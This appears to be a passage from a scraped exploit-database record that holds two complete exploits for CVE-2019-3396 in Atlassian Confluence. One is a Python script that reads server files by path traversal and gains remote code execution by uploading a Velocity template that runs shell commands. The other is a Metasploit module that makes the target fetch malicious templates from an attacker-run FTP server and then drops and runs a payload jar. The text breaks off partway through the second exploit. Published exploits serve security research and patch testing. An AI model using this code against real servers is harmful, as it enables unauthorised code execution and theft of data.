\n\"\"\" \n# creating parser \nparser = argparse.ArgumentParser( \nprog=SCRIPT_NAME, \ndescription=\"Exploit CVE-2019-3396 to explore file system or gain RCE through file upload.\" \n) \n \n# general script arguments \nparser.add_argument( \n\"-V\", \"--version\", \nhelp=\"displays the current version of the script\", \naction=\"version\", \nversion=\"{name} {version}\".format(name=SCRIPT_NAME, version=__version__) \n) \nparser.add_argument( \n\"-v\", \"--verbosity\", \nhelp=\"increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity\", \naction=\"count\", \ndefault=0 \n) \nparser.add_argument( \n\"-sb\", \"--skip-banner\", \nhelp=\"skips printing of the banner\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-s\", \"--silent\", \nhelp=\"do not output results of the exploit to standard output\", \naction=\"store_true\", \ndefault=False \n) \nparser.add_argument( \n\"-q\", \"--quiet\", \nhelp=\"do not output any logs\", \naction=\"store_true\", \ndefault=False \n) \n \n# arguments for input \nparser.add_argument( \n\"-px\", \"--proxy\", \nhelp=\"proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS\" \n) \nparser.add_argument( \n\"-t\", \"--tls\", \nhelp=\"use HTTPS protocol, default behaviour is to use plain HTTP\", \naction=\"store_true\" \n) \nparser.add_argument( \n\"-th\", \"--target-host\", \nhelp=\"target hostname/domain\", \nrequired=True \n) \nparser.add_argument( \n\"-p\", \"--port\", \nhelp=\"port where the target is listening, default ports 80 for HTTP and 443 for HTTPS\" \n) \n \n# two different sub commands \nsubparsers = parser.add_subparsers( \ntitle=\"actions\", \ndescription=\"different behaviours of the script\", \nhelp=\"for detail description of available action options invoke -h for each individual action\", \ndest=\"action\" \n) \n \n# only exploring file system by disclosure of files and directories \nparser_file_system = subparsers.add_parser( \n\"fs\", \nhelp=\"use the exploit to browse local file system on the target endpoint\" \n) \nparser_file_system.add_argument( \n\"path\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_file_system.set_defaults(func=exploit_path_traversal) \n \n# using file upload to deploy payload and achieve RCE \nparser_rce = subparsers.add_parser( \n\"rce\", \nhelp=\"use the exploit to upload a template \" \n) \nparser_rce.add_argument( \n\"-hd\", \"--home-directory\", \nhelp=\"Confluence home directory on the server\" \n) \nparser_rce.add_argument( \n\"-c\", \"--cookie\", \nhelp=\"cookie that should be used for the session, value passed as it is in HTTP request, for example: \" \n\"-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB\", \ntype=check_cookie_format, \nrequired=True \n) \nparser_rce.add_argument( \n\"command\", \nhelp=\"target path that should be retrieved from the vulnerable server, can be path to a file or to a directory\" \n) \nparser_rce.set_defaults(func=exploit_rce) \n \n# parsing \narguments = parser.parse_args() \n \nreturn arguments \n \n \nclass Configuration: \n\"\"\" \nRepresents all supported configuration items. \n\"\"\" \n \n# Parse arguments and set all configuration variables \ndef __init__(self, script_args): \nself.script_arguments = script_args \n \n# setting input arguments \nself._proxy = self.script_arguments.proxy \nself._target_protocol = \"https\" if self.script_arguments.tls else \"http\" \nself._target_host = self.script_arguments.target_host \nself._target_port = self.script_arguments.port if self.script_arguments.port else \\ \n443 if self.script_arguments.tls else 80 \n \n@staticmethod \ndef get_logger(verbosity): \n\"\"\" \nPrepares logger to output to stdout with appropriate verbosity. \n\"\"\" \nlogger = logging.getLogger() \n# default logging level \nlogger.setLevel(logging.DEBUG) \n \n# Definition of logging to console \nch = logging.StreamHandler() \n# specific logging level for console \nif verbosity == 0: \nch.setLevel(logging.INFO) \nelif verbosity > 0: \nch.setLevel(logging.DEBUG) \n \n# formatting \nclass MyFormatter(logging.Formatter): \n \ndefault_fmt = logging.Formatter('[?] %(message)s') \ninfo_fmt = logging.Formatter('[+] %(message)s') \nerror_fmt = logging.Formatter('[-] %(message)s') \nwarning_fmt = logging.Formatter('[!] %(message)s') \ndebug_fmt = logging.Formatter('>>> %(message)s') \n \ndef format(self, record): \nif record.levelno == logging.INFO: \nreturn self.info_fmt.format(record) \nelif record.levelno == logging.ERROR: \nreturn self.error_fmt.format(record) \nelif record.levelno == logging.WARNING: \nreturn self.warning_fmt.format(record) \nelif record.levelno == logging.DEBUG: \nreturn self.debug_fmt.format(record) \nelse: \nreturn self.default_fmt.format(record) \n \nch.setFormatter(MyFormatter()) \n \n# adding handler \nlogger.addHandler(ch) \n \nreturn logger \n \n# Properties \n@property \ndef endpoint(self): \nif not self._target_protocol or not self._target_host or not self._target_port: \nexit_log(log, \"failed to generate endpoint URL\") \nreturn f\"{self._target_protocol}://{self._target_host}:{self._target_port}\" \n \n@property \ndef remote_path(self): \nreturn self.script_arguments.path \n \n@property \ndef attachment_dir(self): \nhome_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \\ \nExploit.DEFAULT_CONFLUENCE_INSTALL_DIR \nreturn f\"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}\" \n \n@property \ndef rce_command(self): \nreturn self.script_arguments.command \n \n@property \ndef session_cookie(self): \nif not self.script_arguments.cookie: \nreturn None \nparts = self.script_arguments.cookie.split(\"=\") \nreturn { \nparts[0]: parts[1] \n} \n \n@property \ndef proxies(self): \nreturn { \n\"http\": self._proxy, \n\"https\": self._proxy \n} \n \n \nclass Exploit: \n\"\"\" \nThis class represents actual exploit towards the target Confluence server. \n\"\"\" \n# used for both path traversal and RCE \nDEFAULT_VULNERABLE_ENDPOINT = \"/rest/tinymce/1/macro/preview\" \n \n# used only for RCE \nCREATE_PERSONAL_SPACE_PATH = \"/rest/create-dialog/1.0/space-blueprint/create-personal-space\" \nPERSONAL_SPACE_KEY_PATH = \"/index.action\" \nPERSONAL_SPACE_KEY_REGEX = r\"^/spaces/viewspace\\.action\\?key=(.*?)$\" \nPERSONAL_SPACE_ID_PATH = \"/rest/api/space\" \nPERSONAL_SPACE_KEY_PARAMETER_NAME = \"spaceKey\" \nHOMEPAGE_REGEX = r\"/rest/api/content/([0-9]+)$\" \nATL_TOKEN_PATH = \"/pages/viewpageattachments.action\" \nFILE_UPLOAD_PATH = \"/pages/doattachfile.action\" \n# file name has no real significance, file is identified on file system by it's ID \n# (change only if you want to avoid detection) \nDEFAULT_UPLOADED_FILE_NAME = \"payload_{}.vm\".format( \n''.join(random.choice(string.ascii_lowercase) for i in range(5)) \n) # the extension .vm is not really needed, remove it if you have problems uploading the template \nDEFAULT_CONFLUENCE_INSTALL_DIR = \"/var/atlassian/application-data/confluence\" \nDEFAULT_CONFLUENCE_ATTACHMENT_PATH = \"/attachments/ver003\" \n# using random name for uploaded file so it will always be first version of the file \nDEFAULT_FILE_VERSION = \"1\" \n \ndef __init__(self, config): \n\"\"\" \nRuns the exploit towards target_url. \n\"\"\" \nself._config = config \n \nself._target_url = f\"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}\" \n \nif self._config.script_arguments.action == \"rce\": \nself._root_url = f\"{self._config.endpoint}/\" \nself._create_personal_space_url = f\"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}\" \nself._personal_space_key_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}\" \n \n# Following data will be dynamically created while exploit is running \nself._space_key = None \nself._personal_space_id_url = None \nself._space_id = None \nself._homepage_id = None \nself._atl_token_url = None \nself._atl_token = None \nself._upload_url = None \nself._file_id = None \n \ndef generate_payload_location(self): \n\"\"\" \nGenerates location on file system for uploaded attachment based on Confluence Ver003 scheme. \n \nSee more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html \n\"\"\" \nif not self._space_id or not self._homepage_id or not self._file_id: \nexit_log(log, \"cannot generate payload location without space, homepage and file ID\") \n \nspace_folder_one = str(int(self._space_id[-3:]) % 250) \nspace_folder_two = str(int(self._space_id[-6:-3]) % 250) \nspace_folder_three = self._space_id \npage_folder_one = str(int(self._homepage_id[-3:]) % 250) \npage_folder_two = str(int(self._homepage_id[-6:-3]) % 250) \npage_folder_three = self._homepage_id \nfile_folder = self._file_id \nversion = Exploit.DEFAULT_FILE_VERSION \n \npayload_location = f\"{self._config.attachment_dir}/\" \\ \nf\"{space_folder_one}/{space_folder_two}/{space_folder_three}/\"\\ \nf\"{page_folder_one}/{page_folder_two}/{page_folder_three}/\" \\ \nf\"{file_folder}/{version}\" \nlog.debug(f\"generated payload location: {payload_location}\") \n \nreturn payload_location \n \ndef path_traversal(self, target_remote_path, decode_output=False): \n\"\"\" \nUses vulnerability in _template parameter to achieve path traversal. \n \nArgs: \ntarget_remote_path (string): path on local file system of the target application \ndecode_output (bool): set to True if output of the file will be character codes separated by new lines, \nused with RCE \n\"\"\" \npost_data = { \n\"contentId\": str(random.randint(1, 10000)), \n\"macro\": { \n\"body\": \"\", \n\"name\": \"widget\", \n\"params\": { \n\"_template\": f\"file://{target_remote_path}\", \n\"url\": \"https://www.youtube.com/watch?v=\" + ''.join(random.choice( \nstring.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11)) \n} \n} \n} \n \nlog.info(\"sending request towards vulnerable endpoint with payload in '_template' parameter\") \nresponse = requests.post( \nself._target_url, \nheaders={ \n\"Content-Type\": \"application/json; charset=utf-8\" \n}, \njson=post_data, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"exploit failed\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \n# if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve \n# the requested path \nerror_element = soup.find_all(\"div\", \"widget-error\") \nif error_element: \nlog.warning(\"failed to retrieve target path on the system\") \nlog.warning(\"target path does not exist or application does not have appropriate permissions to view it\") \nreturn \"\" \nelse: \n# otherwise parse out the actual response (file content or directory listing) \noutput_element = soup.find_all(\"div\", \"wiki-content\") \n \nif not output_element: \nexit_log(log, \"application did not return appropriate HTML element\") \nif not len(output_element) == 1: \nlog.warning(\"application unexpectedly returned multiple HTML elements, using the first one\") \noutput_element = output_element[0] \n \nlog.debug(\"extracting HTML element value and stripping the leading and trailing spaces\") \n# output = output_element.string.strip() \noutput = output_element.decode_contents().strip() \n \nif \"The macro 'widget' is unknown. It may have been removed from the system.\" in output: \nexit_log(log, \"widget seems to be disabled on system, target most likely is not vulnerable\") \n \nif not self._config.script_arguments.silent: \nif decode_output: \nparsed_output = \"\" \np = re.compile(r\"^([0-9]+)\") \nfor line in output.split(\"\\n\"): \nr = p.match(line) \nif r: \nparsed_output += chr(int(r.group(1))) \nprint(parsed_output.strip()) \nelse: \nprint(output) \n \nreturn output \n \ndef find_personal_space_key(self): \n\"\"\" \nMakes request that will return personal space key in the response. \n\"\"\" \nlog.debug(\"checking if user has personal space\") \nresponse = requests.get( \nself._root_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \n) \npage_content = response.text \nif \"Add personal space\" in page_content: \nlog.info(f\"user does not have personal space, creating it now...\") \n \nresponse = requests.post( \nself._create_personal_space_url, \nheaders={ \n\"Content-Type\": \"application/json\" \n}, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \njson={ \n\"spaceUserKey\": \"\" \n} \n) \n \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to create personal space\") \n \nlog.debug(f\"personal space created\") \nresponse_data = response.json() \nself._space_key = response_data.get(\"key\") \nelse: \nlog.info(\"sending request to find personal space key\") \nresponse = requests.get( \nself._personal_space_key_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \npersonal_space_link_element = soup.find(\"a\", id=\"view-personal-space-link\") \nif not personal_space_link_element or not personal_space_link_element.has_attr(\"href\"): \nexit_log(log, \"failed to find personal space link in the response, does the user have personal space?\") \npath = personal_space_link_element[\"href\"] \np = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX) \nr = p.match(path) \nif r: \nself._space_key = r.group(1) \nelse: \nexit_log(log, \"failed to find personal space key\") \n \nlog.debug(f\"personal space key: {self._space_key}\") \nself._personal_space_id_url = f\"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?\" \\ \nf\"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}\" \nlog.debug(f\"generated personal space id url: {self._personal_space_id_url}\") \n \ndef find_personal_space_id_and_homepage_id(self): \n\"\"\" \nMakes request that will return personal space ID and homepage ID in the response. \n\"\"\" \nif self._personal_space_id_url is None: \nexit_log(log, f\"personal space id url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find personal space ID and homepage\") \nresponse = requests.get( \nself._personal_space_id_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is JSON \ndata = json.loads(page_content) \n \nif \"results\" not in data: \nexit_log(log, \"failed to find 'result' section in json output\") \nitems = data[\"results\"] \nif type(items) is not list or len(items) == 0: \nexit_log(log, \"no results for personal space id\") \npersonal_space_data = items[0] \nif \"id\" not in personal_space_data: \nexit_log(log, \"failed to find ID in personal space data\") \nself._space_id = str(personal_space_data[\"id\"]) \nlog.debug(f\"found space id: {self._space_id}\") \nif \"_expandable\" not in personal_space_data: \nexit_log(log, \"failed to find '_expandable' section in personal space data\") \npersonal_space_expandable_data = personal_space_data[\"_expandable\"] \nif \"homepage\" not in personal_space_expandable_data: \nexit_log(log, \"failed to find homepage in personal space expandable data\") \nhomepage_path = personal_space_expandable_data[\"homepage\"] \np = re.compile(Exploit.HOMEPAGE_REGEX) \nr = p.match(homepage_path) \nif r: \nself._homepage_id = r.group(1) \nlog.debug(f\"found homepage id: {self._homepage_id}\") \nself._atl_token_url = f\"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated atl token url: {self._atl_token_url}\") \nself._upload_url = f\"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}\" \nlog.debug(f\"generated upload url: {self._upload_url}\") \nelse: \nexit_log(log, \"failed to find homepage id, homepage path has incorrect format\") \n \ndef get_csrf_token(self): \n\"\"\" \nMakes request to get the current CSRF token for the session. \n\"\"\" \nif self._atl_token_url is None: \nexit_log(log, f\"atl token url is missing, did you call exploit functions in correct order?\") \n \nlog.info(\"sending request to find CSRF token\") \nresponse = requests.get( \nself._atl_token_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nallow_redirects=False \n) \n \n# check if response was proper... \nif not response.status_code == 200: \nlog.debug(f\"response code: {response.status_code}\") \nexit_log(log, \"failed to get personal space key\") \n \npage_content = response.content \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \natl_token_element = soup.find(\"input\", {\"name\": \"atl_token\"}) \nif not atl_token_element.has_attr(\"value\"): \nexit_log(log, \"failed to find value for atl_token\") \nself._atl_token = atl_token_element[\"value\"] \nlog.debug(f\"found CSRF token: {self._atl_token}\") \n \ndef upload_template(self): \n\"\"\" \nMakes multipart request to upload the template file to the server. \n\"\"\" \nlog.info(\"uploading template to server\") \nif not self._atl_token: \nexit_log(log, \"cannot upload a file without CSRF token\") \nif self._upload_url is None: \nexit_log(log, f\"upload url is missing, did you call exploit functions in correct order?\") \n \n# Velocity template here executes command and then captures the output. Here the output is generated by printing \n# character codes one by one in each line. This can be improved for sure but did not have time to investigate \n# why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern \n# webapp' was not working properly. This gets decoded on our python client later. \ntemplate = f\"\"\"#set( $test = \"test\" ) \n#set($ex = $test.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec(\"{self._config.script_arguments.command}\")) \n#set($exout = $ex.waitFor()) \n#set($out = $ex.getInputStream()) \n#foreach($i in [1..$out.available()]) \n#set($ch = $out.read()) \n$ch \n#end\"\"\" \n \nlog.debug(f\"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}\") \nparts = { \n\"atl_token\": (None, self._atl_token), \n\"file_0\": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template), \n\"confirm\": \"Attach\" \n} \nresponse = requests.post( \nself._upload_url, \ncookies=self._config.session_cookie, \nproxies=self._config.proxies, \nverify=False, \nfiles=parts \n) \n \n# for successful upload first a 302 response needs to happen then 200 page is returned with file ID \nif response.status_code == 403: \nexit_log(log, \"got 403, probably problem with CSRF token\") \nif not len(response.history) == 1 or not response.history[0].status_code == 302: \nexit_log(log, \"failed to upload the payload\") \n \npage_content = response.content \n \nif \"Upload Failed\" in str(page_content): \nexit_log(log, \"failed to upload template\") \n \n# response is HTML \nsoup = BeautifulSoup(page_content, features=\"html.parser\") \n \nfile_link_element = soup.find(\"a\", \"filename\", {\"title\": Exploit.DEFAULT_UPLOADED_FILE_NAME}) \nif not file_link_element.has_attr(\"data-linked-resource-id\"): \nexit_log(log, \"failed to find data-linked-resource-id attribute (file ID) for uploaded file link\") \nself._file_id = file_link_element[\"data-linked-resource-id\"] \nlog.debug(f\"found file ID: {self._file_id}\") \n \n \ndef exploit_path_traversal(config): \n\"\"\" \nThis sends one request towards vulnerable server to either get local file content or directory listing. \n\"\"\" \nlog.debug(\"running path traversal exploit\") \n \nexploit = Exploit(config) \nexploit.path_traversal(config.remote_path) \n \n \ndef exploit_rce(config): \n\"\"\"This executes multiple steps to gain RCE. Requires a session token. \n \nSteps: \n1. find personal space key for the user \n2. find personal space ID and homepage ID for the user \n3. get CSRF token (generated per session) \n4. upload template file with Java code (involves two requests, first one is 302 redirection) \n5. use path traversal part of exploit to load and execute local template file \n6. profit \n\"\"\" \nlog.debug(\"running RCE exploit\") \n \nexploit = Exploit(config) \nexploit.find_personal_space_key() \nexploit.find_personal_space_id_and_homepage_id() \nexploit.get_csrf_token() \nexploit.upload_template() \npayload_location = exploit.generate_payload_location() \nexploit.path_traversal(payload_location, decode_output=True) \n \n \nif __name__ == \"__main__\": \n# parse arguments and load all configuration items \nscript_arguments = parse_arguments() \nlog = Configuration.get_logger(script_arguments.verbosity) \n \nconfiguration = Configuration(script_arguments) \n \n# printing banner \nif not configuration.script_arguments.skip_banner: \nprint_banner() \n \nif script_arguments.quiet: \nlog.disabled = True \n \nlog.debug(\"finished parsing CLI arguments\") \nlog.debug(\"configuration was loaded successfully\") \nlog.debug(\"starting exploit\") \n \n# disabling warning about trusting self sign certificate from python requests \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \n# run appropriate function depending on mode \nconfiguration.script_arguments.func(configuration) \n \nlog.debug(\"done!\") \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161065/atlassiancwcm-inject.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-19T03:48:41", "description": "", "cvss3": {}, "published": "2019-04-18T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Widget Connector Macro Velocity Template Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2019-04-18T00:00:00", "id": "PACKETSTORM:152568", "href": "https://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::FtpServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\", \n'Description' => %q{ \nWidget Connector Macro is part of Atlassian Confluence Server and Data Center that \nallows embed online videos, slideshows, photostreams and more directly into page. \nA _template parameter can be used to inject remote Java code into a Velocity template, \nand gain code execution. Authentication is unrequired to exploit this vulnerability. \nBy default, Java payload will be used because it is cross-platform, but you can also \nspecify which native payload you want (Linux or Windows). \n \nConfluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version \n6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. \n \nThis vulnerability was originally discovered by Daniil Dmitriev \nhttps://twitter.com/ddv_ua. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniil Dmitriev', # Discovering vulnerability \n'Dmitry (rrock) Shchannikov' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2019-3396' ], \n[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ], \n[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'], \n[ 'URL', 'https://paper.seebug.org/886/'] \n], \n'Targets' => \n[ \n[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }], \n[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }], \n[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }] \n], \n'DefaultOptions' => \n{ \n'RPORT' => 8090, \n'SRVPORT' => 8021, \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Mar 25 2019', \n'DefaultTarget' => 0, \n'Stance' => Msf::Exploit::Stance::Aggressive \n)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base to Confluence', '/']), \nOptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability', \n'https://www.youtube.com/watch?v=dQw4w9WgXcQ']) \n]) \nend \n \n# Handles ftp RETP command. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] RETR argument. \n# @return [void] \ndef on_client_command_retr(c, arg) \nvprint_status(\"FTP download request for #{arg}\") \nconn = establish_data_connection(c) \nif(not conn) \nc.put(\"425 Can't build data connection\\r\\n\") \nreturn \nend \n \nc.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\") \ncase arg \nwhen /check\\.vm$/ \nconn.put(wrap(get_check_vm)) \nwhen /javaprop\\.vm$/ \nconn.put(wrap(get_javaprop_vm)) \nwhen /upload\\.vm$/ \nconn.put(wrap(get_upload_vm)) \nwhen /exec\\.vm$/ \nconn.put(wrap(get_exec_vm)) \nelse \nconn.put(wrap(get_dummy_vm)) \nend \nc.put(\"226 Transfer complete.\\r\\n\") \nconn.close \nend \n \n# Handles ftp PASS command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] PASS argument. \n# @return [void] \ndef on_client_command_pass(c, arg) \n@state[c][:pass] = arg \nvprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\") \nc.put \"230 Login OK\\r\\n\" \nend \n \n# Handles ftp EPSV command to suppress output. \n# \n# @param c [Socket] Control connection socket. \n# @param arg [String] EPSV argument. \n# @return [void] \ndef on_client_command_epsv(c, arg) \nvprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\") \nc.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\") \nend \n \n# Returns a upload template. \n# \n# @return [String] \ndef get_upload_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}')) \nEOF \n) \nend \n \n# Returns a command execution template. \n# \n# @return [String] \ndef get_exec_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor() \nEOF \n) \nend \n \n# Returns checking template. \n# \n# @return [String] \ndef get_check_vm \n( \n<<~EOF \n#{@check_text} \nEOF \n) \nend \n \n# Returns Java's getting property template. \n# \n# @return [String] \ndef get_javaprop_vm \n( \n<<~EOF \n$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString() \nEOF \n) \nend \n \n# Returns dummy template. \n# \n# @return [String] \ndef get_dummy_vm \n( \n<<~EOF \nEOF \n) \nend \n \n# Checks the vulnerability. \n# \n# @return [Array] Check code \ndef check \ncheckcode = Exploit::CheckCode::Safe \nbegin \n# Start the FTP service \nprint_status(\"Starting the FTP server.\") \nstart_service \n \n@check_text = Rex::Text.rand_text_alpha(5..10) \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\") \nif res && res.body && res.body.include?(@check_text) \ncheckcode = Exploit::CheckCode::Vulnerable \nend \nrescue Msf::Exploit::Failed => e \nvprint_error(e.message) \ncheckcode = Exploit::CheckCode::Unknown \nend \ncheckcode \nend \n \n# Injects Java code to the template. \n# \n# @param service_url [String] Address of template to injection. \n# @return [void] \ndef inject_template(service_url, timeout=20) \n \nuri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'headers' => { \n'Accept' => '*/*', \n'Origin' => full_uri(vhost_uri: true) \n}, \n'ctype' => 'application/json; charset=UTF-8', \n'data' => { \n'contentId' => '1', \n'macro' => { \n'name' => 'widget', \n'body' => '', \n'params' => { \n'url' => datastore['TRIGGERURL'], \n'_template' => service_url \n} \n \n} \n}.to_json \n}, timeout=timeout) \n \nunless res \nunless service_url.include?(\"exec.vm\") \nprint_warning('Connection timed out in #inject_template') \nend \nreturn \nend \n \nif res.body.include? 'widget-error' \nprint_error('Failed to inject and execute code:') \nelse \nvprint_status(\"Server response:\") \nend \n \nvprint_line(res.body) \n \nres \nend \n \n# Returns a system property for Java. \n# \n# @param prop [String] Name of the property to retrieve. \n# @return [String] \ndef get_java_property(prop) \n@prop = prop \nres = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\") \nif res && res.body \nreturn clear_response(res.body) \nend \n'' \nend \n \n# Returns the target platform. \n# \n# @return [String] \ndef get_target_platform \nreturn get_java_property('os.name') \nend \n \n# Checks if the target os/platform is compatible with the module target or not. \n# \n# @return [TrueClass] Compatible \n# @return [FalseClass] Not compatible \ndef target_platform_compat?(target_platform) \ntarget.platform.names.each do |n| \nif n.downcase == 'java' || target_platform.downcase.include?(n.downcase) \nreturn true \nend \nend \n \nfalse \nend \n \n# Returns a temp path from the remote target. \n# \n# @return [String] \ndef get_tmp_path \nreturn get_java_property('java.io.tmpdir') \nend \n \n# Returns the Java home path used by Confluence. \n# \n# @return [String] \ndef get_java_home_path \nreturn get_java_property('java.home') \nend \n \n# Returns Java code that can be used to inject to the template in order to copy a file. \n# \n# @note The purpose of this method is to have a file that is not busy, so we can execute it. \n# It is meant to be used with #get_write_file_code. \n# \n# @param fname [String] The file to copy \n# @param new_fname [String] The new file \n# @return [void] \ndef get_dup_file_code(fname, new_fname) \nif fname =~ /^\\/[[:print:]]+/ \n@command = \"cp #{fname} #{new_fname}\" \nelse \n@command = \"cmd.exe /C copy #{fname} #{new_fname}\" \nend \n \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\") \nend \n \n# Returns the normalized file path for payload. \n# \n# @return [String] \ndef normalize_payload_fname(tmp_path, fname) \n# A quick way to check platform insteaf of actually grabbing os.name in Java system properties. \nif /^\\/[[:print:]]+/ === tmp_path \nRex::FileUtils.normalize_unix_path(tmp_path, fname) \nelse \nRex::FileUtils.normalize_win_path(tmp_path, fname) \nend \nend \n \n# Exploits the target in Java platform. \n# \n# @return [void] \ndef exploit_as_java \n \ntmp_path = get_tmp_path \n \nif tmp_path.blank? \nfail_with(Failure::Unknown, 'Unable to get the temp path.') \nend \n \n@fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\") \n@b64 = Rex::Text.encode_base64(payload.encoded_jar) \n@command = '' \n \njava_home = get_java_home_path \n \nif java_home.blank? \nfail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') \nelse \nvprint_status(\"Found Java home path: #{java_home}\") \nend \n \nregister_files_for_cleanup(@fname) \n \nif /^\\/[[:print:]]+/ === @fname \nnormalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java') \n@command = %Q|#{normalized_java_path} -jar #{@fname}| \nelse \nnormalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe') \n@fname.gsub!(/Program Files/, 'PROGRA~1') \n@command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}| \nend \n \nprint_status(\"Attempting to upload #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\") \n \nprint_status(\"Attempting to execute #{@fname}\") \ninject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5) \nend \n \n \n# Exploits the target in Windows platform. \n# \n# @return [void] \ndef exploit_as_windows \ntmp_path = get_tmp_path \n \nif tmp_path.blank? 